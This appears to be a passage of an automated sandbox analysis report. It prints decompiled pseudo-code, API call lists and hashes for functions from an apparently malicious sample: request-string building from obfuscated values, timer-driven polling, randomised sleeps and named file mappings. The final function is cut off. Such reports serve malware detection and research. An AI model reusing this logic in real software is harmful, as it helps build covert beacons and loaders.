Uniqueness Score: -1.00%

Function 02C824B4, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02C824B4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2c8d018; // 0x99c08bf
				asm("bswap eax");
				_t61 =  *0x2c8d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x2c8d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2c8d00c; // 0x81762942
				asm("bswap eax");
				_t64 =  *0x2c8d2a4; // 0x245a5a8
				_t3 = _t64 + 0x2c8e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d154, _t63, _t62, _t61, _t60,  *0x2c8d02c,  *0x2c8d004, _t59);
				_t67 = E02C82914();
				_t68 =  *0x2c8d2a4; // 0x245a5a8
				_t4 = _t68 + 0x2c8e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E02C83F0E(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x2c8d2a4; // 0x245a5a8
					_t7 = _t127 + 0x2c8e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x2c8d238, 0, _v8);
				}
				_t73 = E02C81363();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x2c8d2a4; // 0x245a5a8
					_t11 = _t122 + 0x2c8e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x2c8d238, 0, _v8);
				}
				_t147 =  *0x2c8d32c; // 0x50e95b0
				_t75 = E02C818D5(0x2c8d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x2c8d238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2c8d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2c8d238, _t153, _v20);
						goto L26;
					}
					E02C86852(GetTickCount());
					_t82 =  *0x2c8d32c; // 0x50e95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2c8d32c; // 0x50e95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2c8d32c; // 0x50e95b0
					_t149 = E02C88840(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x2c8d238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x2c8c2ac);
					_push(_t149);
					_t94 = E02C88007();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						RtlFreeHeap( *0x2c8d238, _t153, _t149); // executed
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E02C81546(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E02C845F1();
						L22:
						HeapFree( *0x2c8d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E02C82284(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E02C85349(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E02C8A5FA(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E02C888F0(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02C8A5FA(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02c824b4
0x02c824b4
0x02c824b4
0x02c824bd
0x02c824c6
0x02c824c8
0x02c824c8
0x02c824d5
0x02c824e0
0x02c824e3
0x02c824e8
0x02c824f1
0x02c824f4
0x02c824f9
0x02c824fc
0x02c82501
0x02c82504
0x02c82510
0x02c8251d
0x02c8251f
0x02c82525
0x02c8252a
0x02c82535
0x02c82537
0x02c8253a
0x02c8253c
0x02c82541
0x02c82547
0x02c8254c
0x02c8254f
0x02c82554
0x02c82561
0x02c82563
0x02c82569
0x02c82573
0x02c82573
0x02c82575
0x02c8257a
0x02c8257f
0x02c82582
0x02c82587
0x02c82594
0x02c82596
0x02c825a4
0x02c825a4
0x02c825a6
0x02c825b4
0x02c825b9
0x02c825bb
0x02c825c0
0x02c82783
0x02c8278d
0x02c82796
0x02c825c6
0x02c825d2
0x02c825d8
0x02c825dd
0x02c82777
0x02c82781
0x00000000
0x02c82781
0x02c825e9
0x02c825ee
0x02c825f7
0x02c82608
0x02c8260c
0x02c82615
0x02c8261b
0x02c8262a
0x02c82631
0x02c8263a
0x02c82640
0x02c8276b
0x02c82775
0x00000000
0x02c82775
0x02c8264c
0x02c82652
0x02c82653
0x02c82658
0x02c8265d
0x02c82761
0x02c82769
0x00000000
0x02c82769
0x02c82666
0x02c8266d
0x02c82675
0x02c8267a
0x02c82683
0x02c82689
0x02c82690
0x02c82695
0x02c8269a
0x02c82799
0x02c8274d
0x02c8274d
0x02c82752
0x02c8275d
0x02c8275f
0x00000000
0x02c8275f
0x02c826a4
0x02c826a9
0x02c826ae
0x02c826b3
0x02c826be
0x02c826c3
0x02c826c6
0x02c826cc
0x02c826d2
0x02c826d8
0x02c826db
0x02c826e1
0x02c826e4
0x02c826e9
0x02c826ed
0x02c826ed
0x02c826f9
0x02c82705
0x02c82709
0x02c8270b
0x02c82710
0x02c82712
0x02c82717
0x02c8271c
0x02c82729
0x02c82731
0x02c82734
0x02c82734
0x02c82710
0x00000000
0x02c826fb
0x02c826ff
0x02c82736
0x02c82739
0x02c82742
0x00000000
0x00000000
0x00000000
0x00000000
0x02c82742
0x02c82701
0x00000000
0x02c82701
0x02c826f9

APIs

GetTickCount.KERNEL32 ref: 02C824C8
wsprintfA.USER32 ref: 02C82518
wsprintfA.USER32 ref: 02C82535
wsprintfA.USER32 ref: 02C82561
HeapFree.KERNEL32(00000000,?), ref: 02C82573
wsprintfA.USER32 ref: 02C82594
HeapFree.KERNEL32(00000000,?), ref: 02C825A4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02C825D2
GetTickCount.KERNEL32 ref: 02C825E3
RtlEnterCriticalSection.NTDLL(050E9570), ref: 02C825F7
RtlLeaveCriticalSection.NTDLL(050E9570), ref: 02C82615

Part of subcall function 02C88840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,02C82AF0,?,050E95B0), ref: 02C8886B
Part of subcall function 02C88840: lstrlen.KERNEL32(?,?,?,02C82AF0,?,050E95B0), ref: 02C88873
Part of subcall function 02C88840: strcpy.NTDLL ref: 02C8888A
Part of subcall function 02C88840: lstrcat.KERNEL32(00000000,?), ref: 02C88895
Part of subcall function 02C88840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02C82AF0,?,050E95B0), ref: 02C888B2

StrTrimA.SHLWAPI(00000000,02C8C2AC,?,050E95B0), ref: 02C8264C

Part of subcall function 02C88007: lstrlen.KERNEL32(050E9918,00000000,00000000,745EC740,02C82B1B,00000000), ref: 02C88017
Part of subcall function 02C88007: lstrlen.KERNEL32(?), ref: 02C8801F
Part of subcall function 02C88007: lstrcpy.KERNEL32(00000000,050E9918), ref: 02C88033
Part of subcall function 02C88007: lstrcat.KERNEL32(00000000,?), ref: 02C8803E

lstrcpy.KERNEL32(00000000,?), ref: 02C8266D
lstrcpy.KERNEL32(?,?), ref: 02C82675
lstrcat.KERNEL32(?,?), ref: 02C82683
lstrcat.KERNEL32(?,00000000), ref: 02C82689

Part of subcall function 02C81546: lstrlen.KERNEL32(?,00000000,02C8D330,00000001,02C867F7,02C8D00C,02C8D00C,00000000,00000005,00000000,00000000,?,?,?,02C841AA,02C85D90), ref: 02C8154F
Part of subcall function 02C81546: mbstowcs.NTDLL ref: 02C81576
Part of subcall function 02C81546: memset.NTDLL ref: 02C81588

wcstombs.NTDLL ref: 02C8271C

Part of subcall function 02C85349: SysAllocString.OLEAUT32(?), ref: 02C85384
Part of subcall function 02C85349: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02C85407

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

HeapFree.KERNEL32(00000000,?,?), ref: 02C8275D
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02C82769
HeapFree.KERNEL32(00000000,?,?,050E95B0), ref: 02C82775
HeapFree.KERNEL32(00000000,?), ref: 02C82781
HeapFree.KERNEL32(00000000,?), ref: 02C8278D

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: 67e36d3ed00dcf07508f9e31891947a66ed0f2d8251c736340be0fa3e86f97c2
Instruction ID: 80d4c2297ccec1f561542fd69749cb27654d5d7807ffde922b06fcc8ecc147ee
Opcode Fuzzy Hash: 67e36d3ed00dcf07508f9e31891947a66ed0f2d8251c736340be0fa3e86f97c2
Instruction Fuzzy Hash: D3915971900209AFCB11EFB5DC88A9E7BB9EF48358F148565F80AD7260C731DA61DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C88494, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02C88494(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2c8d240);
					_v20 = 0;
					_v16 = 0;
					L02C8B078();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2c8d26c; // 0x2d8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2c8d24c = 5;
						} else {
							_t68 = E02C8579B(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2c8d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02C88A1D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02C88634(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2c8d244);
							goto L21;
						} else {
							__eflags =  *0x2c8d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02C845F1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2c8d248);
								L21:
								L02C8B078();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2c8d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x02c88494
0x02c884a6
0x02c884a9
0x02c884b5
0x02c884bb
0x02c884c0
0x02c88627
0x02c884c6
0x02c884c6
0x02c884c8
0x02c884cd
0x02c884ce
0x02c884d4
0x02c884d7
0x02c884da
0x02c884e8
0x02c884f3
0x02c884f6
0x02c884f8
0x02c88505
0x02c8850f
0x02c88511
0x02c88516
0x02c8851b
0x02c88526
0x02c88526
0x02c8851d
0x02c8851d
0x02c88524
0x00000000
0x00000000
0x02c88524
0x02c88530
0x00000000
0x02c88533
0x02c88537
0x02c88542
0x02c88542
0x02c88549
0x02c88552
0x02c88559
0x02c88562
0x02c88565
0x02c88568
0x02c8856d
0x02c88572
0x00000000
0x00000000
0x02c88574
0x02c88577
0x02c8857a
0x02c8857d
0x00000000
0x02c8857f
0x02c8858e
0x02c8858e
0x00000000
0x02c885bc
0x02c885bc
0x02c885c1
0x02c885e0
0x02c885e2
0x02c885e7
0x02c885e8
0x00000000
0x02c885c3
0x02c885c3
0x02c885c9
0x00000000
0x02c885cb
0x02c885cb
0x02c885d0
0x02c885d2
0x02c885d7
0x02c885d8
0x02c885ee
0x02c885ee
0x02c885f6
0x02c88601
0x02c88604
0x02c8860f
0x02c88611
0x02c88614
0x02c88616
0x00000000
0x02c8861c
0x00000000
0x02c8861c
0x02c88616
0x02c885c9
0x00000000
0x02c885c1
0x02c88591
0x02c88593
0x02c88596
0x02c88597
0x02c88597
0x02c8859b
0x02c885a5
0x02c885a5
0x02c885ab
0x02c885ae
0x02c885ae
0x02c885b4
0x02c885b4
0x02c88631
0x00000000

APIs

memset.NTDLL ref: 02C884A9
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02C884B5
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02C884DA
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02C884F6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C8850F
HeapFree.KERNEL32(00000000,00000000), ref: 02C885A5
CloseHandle.KERNEL32(?), ref: 02C885B4
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02C885EE
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02C85DBE,?), ref: 02C88604
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C8860F

Part of subcall function 02C8579B: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050E9388,00000000,?,73BCF710,00000000,73BCF730), ref: 02C857EA
Part of subcall function 02C8579B: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050E93C0,?,00000000,30314549,00000014,004F0053,050E937C), ref: 02C85887
Part of subcall function 02C8579B: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02C88522), ref: 02C85899

GetLastError.KERNEL32 ref: 02C88621

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 8dfd7d4ec38c2e5219eeeb94a1bbf05451cc5e371eaf8c264dfd6c76d4f92919
Instruction ID: 5dab03ab24c7b7c16f2a47d8ed649891a9da267668c1b6de052e872714fc531f
Opcode Fuzzy Hash: 8dfd7d4ec38c2e5219eeeb94a1bbf05451cc5e371eaf8c264dfd6c76d4f92919
Instruction Fuzzy Hash: 7E516BB1C0122CAADF10AFA5DC44EEEBFB9EF49368F508616F511E2190D7309A50DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D481237(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6D481CDD();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6D4810E8(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6D48179C(E6D481424,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6D481BE5(_t44,  &_a4) != 0) {
					 *0x6d484138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6d484138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6D481CC8(_t48 + _t14);
				 *0x6d484138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6D48133D(_t43);
				goto L11;
			}

0x6d48123e
0x6d481245
0x6d48124a
0x6d48133a
0x6d48133a
0x6d481251
0x6d481255
0x6d48125b
0x6d481269
0x6d48126a
0x6d48126d
0x6d481270
0x6d481279
0x6d48127c
0x6d481282
0x6d481285
0x6d48128c
0x6d481337
0x00000000
0x6d481337
0x6d481296
0x6d4812e7
0x6d4812e7
0x6d4812fd
0x6d481302
0x6d48132a
0x6d481304
0x6d481307
0x6d48130d
0x6d481312
0x6d481319
0x6d481319
0x6d481320
0x6d481320
0x6d48132d
0x6d481333
0x6d481335
0x6d481335
0x00000000
0x6d481333
0x6d4812a3
0x6d4812e1
0x00000000
0x6d4812e1
0x6d4812a5
0x6d4812a8
0x6d4812b1
0x6d4812b3
0x6d4812b7
0x6d4812d9
0x6d4812d9
0x00000000
0x6d4812d9
0x6d4812b9
0x6d4812be
0x6d4812c3
0x6d4812ca
0x00000000
0x00000000
0x6d4812cf
0x6d4812d2
0x00000000

APIs

Part of subcall function 6D481CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D481243,73B763F0), ref: 6D481CEC
Part of subcall function 6D481CDD: GetVersion.KERNEL32 ref: 6D481CFB
Part of subcall function 6D481CDD: GetCurrentProcessId.KERNEL32 ref: 6D481D17
Part of subcall function 6D481CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D481D30

GetSystemTime.KERNEL32(?,00000000,73B763F0), ref: 6D481255
SwitchToThread.KERNEL32 ref: 6D48125B

Part of subcall function 6D4810E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6D48113E
Part of subcall function 6D4810E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6D481204

Sleep.KERNELBASE(00000000,00000000), ref: 6D48127C
GetLongPathNameW.KERNELBASE ref: 6D4812B1
GetLongPathNameW.KERNELBASE ref: 6D4812CF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6D481307
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D481319
CloseHandle.KERNEL32(00000000), ref: 6D481320
GetLastError.KERNEL32(?,00000000), ref: 6D481328
GetLastError.KERNEL32 ref: 6D481335

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 9802d0f81ea4b0799d967ae315c9df8a216da203c19499a6f3b98b71ea7f0845
Instruction ID: d566dd2cf2860a36330af792db5eb64f1c04aafaf4cc3ddbd0af6cd6f491215f
Opcode Fuzzy Hash: 9802d0f81ea4b0799d967ae315c9df8a216da203c19499a6f3b98b71ea7f0845
Instruction Fuzzy Hash: B9318875C04655ABDB01EBA98C88EAE77BDEB473E5B21411BE521E3242E734CD00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D481352, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6D481352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D482130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d484144;
				_push(_t15 + 0x6d48505e);
				_push(_t15 + 0x6d485054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D48212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6d484148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d481352
0x6d48135b
0x6d48135f
0x6d481365
0x6d48136a
0x6d48136f
0x6d481372
0x6d481375
0x6d48137a
0x6d48137b
0x6d48137e
0x6d481389
0x6d481390
0x6d481394
0x6d481396
0x6d481397
0x6d48139a
0x6d48139f
0x6d4813a9
0x6d4813ab
0x6d4813ab
0x6d4813bf
0x6d4813c5
0x6d4813c9
0x6d481419
0x6d4813cb
0x6d4813d4
0x6d4813ea
0x6d4813f2
0x6d481404
0x6d481408
0x00000000
0x00000000
0x6d4813f4
0x6d4813f7
0x6d4813fc
0x6d4813fe
0x6d4813fe
0x6d4813df
0x6d4813e1
0x6d48140a
0x6d48140b
0x6d48140b
0x6d4813d4
0x6d481421

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?,?), ref: 6D48135F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D481375
_snwprintf.NTDLL ref: 6D48139A
CreateFileMappingW.KERNELBASE(000000FF,6D484148,00000004,00000000,?,?), ref: 6D4813BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?), ref: 6D4813D6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6D4813EA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?), ref: 6D481402
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A), ref: 6D48140B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?), ref: 6D481413

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: e6d06e6f01d8273d59f4436f0d0557de8dc4f4f729507889d97925eaafad5e81
Instruction ID: 4c5aafa425dbcb09cf0766d04994db29f88272576b8ca934b976d908bab8cfed
Opcode Fuzzy Hash: e6d06e6f01d8273d59f4436f0d0557de8dc4f4f729507889d97925eaafad5e81
Instruction Fuzzy Hash: A2218372500148ABDB11AFA4CC88FAE77B9EB463D6F11402AF625E7245D770DD458760

Uniqueness

Uniqueness Score: -1.00%

Function 02C881E7, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02C881E7(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02C8B072();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2c8d2a4; // 0x245a5a8
				_t5 = _t13 + 0x2c8e862; // 0x50e8e0a
